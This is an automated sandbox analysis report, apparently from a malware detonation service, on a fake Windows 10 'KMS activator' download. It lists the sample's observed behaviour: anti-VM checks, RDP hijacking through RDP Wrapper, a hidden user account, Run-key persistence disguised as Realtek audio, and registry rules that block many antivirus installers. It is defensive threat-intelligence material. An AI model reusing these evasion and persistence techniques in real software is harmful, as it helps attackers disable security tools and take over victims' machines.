Analysis Overview
Threat Level: Known bad
The file https://kms-auto.site/windows-10-activator/ was found to be: Known bad.
Malicious Activity Summary
RMS
Rms family
Detected Nirsoft tools
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Grants admin privileges
Remote Service Session Hijacking: RDP Hijacking
Modifies Windows Firewall
Stops running service(s)
Blocks application from running via registry modification
Drops file in Drivers directory
Server Software Component: Terminal Services DLL
Themida packer
Checks BIOS information in registry
Checks computer location settings
Modifies file permissions
Loads dropped DLL
Executes dropped EXE
Command and Scripting Interpreter: PowerShell
Adds Run key to start application
Modifies WinLogon
Looks up external IP address via web service
Checks whether UAC is enabled
Drops file in System32 directory
Hide Artifacts: Hidden Users
AutoIT Executable
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Program Files directory
Drops file in Windows directory
Launches sc.exe
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Permission Groups Discovery: Local Groups
Event Triggered Execution: Netsh Helper DLL
Runs net.exe
Delays execution with timeout.exe
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Suspicious use of SetWindowsHookEx
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
Uses Volume Shadow Copy service COM API
Checks processor information in registry
NTFS ADS
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: EnumeratesProcesses
Modifies registry class
Suspicious use of FindShellTrayWindow
Modifies data under HKEY_USERS
Suspicious use of SendNotifyMessage
Scheduled Task/Job: Scheduled Task
Suspicious behavior: LoadsDriver
Enumerates system info in registry
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-04-19 20:52
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2025-04-19 20:52
Reported
2025-04-19 21:05
Platform
win10ltsc2021-20250410-en
Max time kernel
751s
Max time network
752s
Command Line
Signatures
RMS
Rms family
Detected Nirsoft tools
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Grants admin privileges
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Windows\SysWOW64\unsecapp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\17f790d5-9468-40ac-8b9a-1b672e685976_KMSTools.zip.976\KMS Tools Lite Portable\KMSTools Lite.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1baee621-d038-4d45-a4c5-391449c8479b_KMSTools.zip.79b\KMS Tools Lite Portable\KMSTools Lite.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\7zO84806EDE\KMSTools Lite.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\KMS Tools Lite Portable\KMSTools Lite.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\Setup\KMS.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\Setup\update.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\Setup\IP.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\Setup\smss.exe | N/A |
Remote Service Session Hijacking: RDP Hijacking
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net1.exe | N/A |
Blocks application from running via registry modification
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\19 = "eset_nod32_antivirus_live_installer.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\20 = "MBSetup.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\23 = "drweb-12.0-ss-win.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\17 = "eset_internet_security_live_installer.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\22 = "bitdefender_avfree.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\24 = "Cureit.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\26 = "eset_smart_security_premium_live_installer.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\15 = "cureit.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\21 = "PANDAFREEAV.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\14 = "KVRT.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\16 = "FRST64.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\18 = "esetonlinescanner.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\25 = "TDSSKiller.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\12 = "AVbr.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\13 = "AV_br.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\ProgramData\Setup\update.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SYSTEM32\netsh.exe | N/A |
Server Software Component: Terminal Services DLL
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" | C:\ProgramData\RDPWinst.exe | N/A |
Stops running service(s)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Setup\IP.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Windows\SysWOW64\unsecapp.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1baee621-d038-4d45-a4c5-391449c8479b_KMSTools.zip.79b\KMS Tools Lite Portable\KMSTools Lite.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zO84806EDE\KMSTools Lite.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\KMS Tools Lite Portable\KMSTools Lite.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\unsecapp.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1baee621-d038-4d45-a4c5-391449c8479b_KMSTools.zip.79b\KMS Tools Lite Portable\KMSTools Lite.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Setup\KMS.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Setup\update.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Setup\smss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Setup\smss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\17f790d5-9468-40ac-8b9a-1b672e685976_KMSTools.zip.976\KMS Tools Lite Portable\KMSTools Lite.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zO84806EDE\KMSTools Lite.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\KMS Tools Lite Portable\KMSTools Lite.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Setup\IP.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\17f790d5-9468-40ac-8b9a-1b672e685976_KMSTools.zip.976\KMS Tools Lite Portable\KMSTools Lite.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Setup\KMS.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Setup\update.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Setup\update.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Setup\svchost.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Setup\smss.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Setup\install.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Windows\System32\svchost.exe | N/A |
Modifies file permissions
Themida packer
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" | C:\ProgramData\Setup\IP.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\7zO84806EDE\KMSTools Lite.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Setup\KMS.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Setup\update.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Setup\IP.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Setup\smss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Windows\SysWOW64\unsecapp.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | ip-api.com | N/A | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" | C:\ProgramData\RDPWinst.exe | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SysWOW64\unsecapp.exe | C:\ProgramData\Setup\IP.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\unsecapp.exe | C:\ProgramData\Setup\IP.exe | N/A |
| File created | C:\Windows\System32\rfxvmt.dll | C:\ProgramData\RDPWinst.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Hide Artifacts: Hidden Users
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Windows\system32\reg.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\17f790d5-9468-40ac-8b9a-1b672e685976_KMSTools.zip.976\KMS Tools Lite Portable\KMSTools Lite.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1baee621-d038-4d45-a4c5-391449c8479b_KMSTools.zip.79b\KMS Tools Lite Portable\KMSTools Lite.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO84806EDE\KMSTools Lite.exe | N/A |
| N/A | N/A | C:\KMS Tools Lite Portable\KMSTools Lite.exe | N/A |
| N/A | N/A | C:\ProgramData\Setup\KMS.exe | N/A |
| N/A | N/A | C:\ProgramData\Setup\update.exe | N/A |
| N/A | N/A | C:\ProgramData\Setup\IP.exe | N/A |
| N/A | N/A | C:\ProgramData\Setup\smss.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\unsecapp.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | C:\Program Files (x86)\Microsoft JDX | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files (x86)\AVAST Software | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Doctor Web | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\McAfee | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\Loaris Trojan Remover | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files (x86)\IObit\Advanced SystemCare | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Moo0 | C:\ProgramData\Setup\update.exe | N/A |
| File created | C:\Program Files\Common Files\System\iediagcmd.exe | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Kaspersky Lab | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\Cezurity | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GRIZZLY Antivirus | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\Process Lasso | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\Process Hacker 2 | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\EnigmaSoft | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\QuickCPU | C:\ProgramData\Setup\update.exe | N/A |
| File created | C:\Program Files\RDP Wrapper\rdpwrap.dll | C:\ProgramData\RDPWinst.exe | N/A |
| File opened for modification | C:\Program Files (x86)\SpyHunter | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\AVAST Software | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Transmission | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\RogueKiller | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\CPUID\HWMonitor | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\ReasonLabs | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\RDP Wrapper\rdpwrap.ini | C:\ProgramData\Setup\smss.exe | N/A |
| File created | C:\Program Files\RDP Wrapper\rdpwrap.ini | C:\ProgramData\RDPWinst.exe | N/A |
| File opened for modification | C:\Program Files\COMODO | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files (x86)\AVG | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\DrWeb | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files (x86)\SpeedFan | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GPU Temp | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files (x86)\360 | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\AV | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Panda Security | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files (x86)\IObit | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\Transmission | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\RDP Wrapper | C:\ProgramData\Setup\smss.exe | N/A |
| File opened for modification | C:\Program Files\Malwarebytes | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\HitmanPro | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\Kaspersky Lab | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\Bitdefender Agent | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Wise | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\ByteFence | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Cezurity | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\Rainmeter | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\ESET | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\SUPERAntiSpyware | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files (x86)\MSI\MSI Center | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\NETGATE | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\Enigma Software Group | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\SpyHunter | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\AVG | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\Ravantivirus | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files (x86)\IObit\IObit Malware Fighter | C:\ProgramData\Setup\update.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\Notification\notification_fast.bundle.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_970595340\hyph-fr.hyb | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_970595340\hyph-te.hyb | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-notification\ru\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-tokenized-card\nl\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\Notification\notification.bundle.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_970595340\hyph-as.hyb | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_762528129\auto_open_controller.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-hub\fi\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-mobile-hub\nl\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-shared-components\id\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\Mini-Wallet\miniwallet.bundle.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\wallet-icon.svg | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\wallet-webui-992.268aa821c3090dce03cb.chunk.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_653919595\Part-NL | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-ec\fi\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-hub\el\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-mobile-hub\zh-Hans\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_762528129\edge_driver.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
